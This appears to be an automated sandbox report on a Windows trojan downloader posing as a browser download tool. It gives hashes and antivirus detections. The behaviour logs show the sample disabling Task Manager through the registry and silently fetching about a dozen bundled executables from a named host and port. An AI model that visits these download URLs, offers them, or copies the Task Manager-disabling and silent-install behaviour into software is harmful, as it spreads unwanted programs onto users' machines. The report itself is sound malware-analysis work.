Analysis Date: 2015-03-11 08:05:50
MD5: 53f104a862c26b8b3f8eb277c39d54f8
SHA1: 45268a82c3c6a11575900e8c1512f326fe289558

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: e1fcb3384e3d4a7fee8707575169b423 sha1: 7cdd4a976ce92c25ea19032e5e6acc5c9258efe7 size: 425984
Section: .rdata md5: 920d9217567c32989e36f39e95441f66 sha1: bb1e9530c517a4c9c1c64840f4fa885fbfde9480 size: 69632
Section: .data md5: 781a7d593d1ff6e435e399449f219fb5 sha1: b4e330b5392f4a34e3f2eef3e7b9c65960b86535 size: 61440
Section: .rsrc md5: 2ac8a57cf2ba0048fc937073697383bc sha1: be924771e27b17330d9fbbb2dff2a6e265cdc81d size: 90112
Timestamp: 2014-12-31 19:28:58
Version:
LegalCopyright: AV浏览器在线下载器 版权所有
FileVersion: 1.0.0.0
CompanyName: AV浏览器在线下载器
Comments: AV浏览器在线下载器
ProductName: AV浏览器在线下载器
ProductVersion: 1.0.0.0
FileDescription: AV浏览器在线下载器
Packer: Microsoft Visual C++ v6.0
PEhash: f5c4068ac6320da24c8857aa20e9a8e6e0d5e031
IMPhash: 0ea62fd10058f1257469f695d7d03cf5
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.GenericKD.2153258
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): Trojan.GenericKD.2153258
AV Authentium: W32/Agent.EW.gen!Eldorado
AV Avira (antivir): TR/Agent.651264.291
AV BullGuard: Trojan.GenericKD.2153258
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Trojan.GenericKD.2153258
AV Eset (nod32): no_virus
AV Fortinet: W32/Diztakun.FZV!tr
AV Frisk (f-prot): W32/Agent.EW.gen!Eldorado
AV F-Secure: Trojan:W32/DelfInject.R
AV Grisoft (avg): Win32/DH{IEEuQ4ETIiVXTg}
AV Ikarus: Trojan.SuspectCRC
AV K7: Trojan ( 004b4ad01 )
AV Kaspersky 2015: Trojan.Win32.Diztakun.fzv
AV MalwareBytes: no_virus
AV Mcafee: RDN/Generic Downloader.x!mt
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): Trojan.GenericKD.2153258
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): Trojan-Downloader.EIC.7121

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr ➝ 1
Creates File: C:\Program Files\UCBrowser_silent_44750464.exe
Creates File: C:\Program Files\pic_silent_44750464.exe
Creates File: C:\Program Files\pps_silent_44750464.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Program Files\QQBrowser_silent_44750464.exe
Creates File: C:\Program Files\sogouie_silent_44750464.exe
Creates File: C:\Program Files\baidusd_silent_44750464.exe
Creates File: C:\Program Files\kuwo_silent_44750464.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Program Files\ADMon.29055-8373.exe
Creates File: C:\Program Files\PPTV_forqd3036_08373.exe
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Program Files\haozip_silent_44750464.exe
Creates File: C:\Program Files\baiduan_silent_44750464.exe
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNS: download.58611.net
Type: A
218.241.29.215
HTTP GET: http://download.58611.net:8181/QQBrowser/QQBrowser_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://download.58611.net:8181/pps/pps_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://download.58611.net:8181/uc/UCBrowser_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://download.58611.net:8181/haozip_silent/haozip_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://download.58611.net:8181/baiduan/baiduan_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://download.58611.net:8181/baidusd/baidusd_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://download.58611.net:8181/sogouie/sogouie_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://download.58611.net:8181/pic/pic_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://download.58611.net:8181/kuwo_silent/kuwo_silent_44750464.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://download.58611.net:8181/admon/ADMon.29055-8437.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://download.58611.net:8181/pptv_silent/PPTV_forqd3036_08437.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1032 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1033 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1034 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1035 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1036 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1037 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1038 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1039 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1040 ➝ 218.241.29.215:8181
Flows TCP: 192.168.1.1:1041 ➝ 218.241.29.215:8181

Raw Pcap

Strings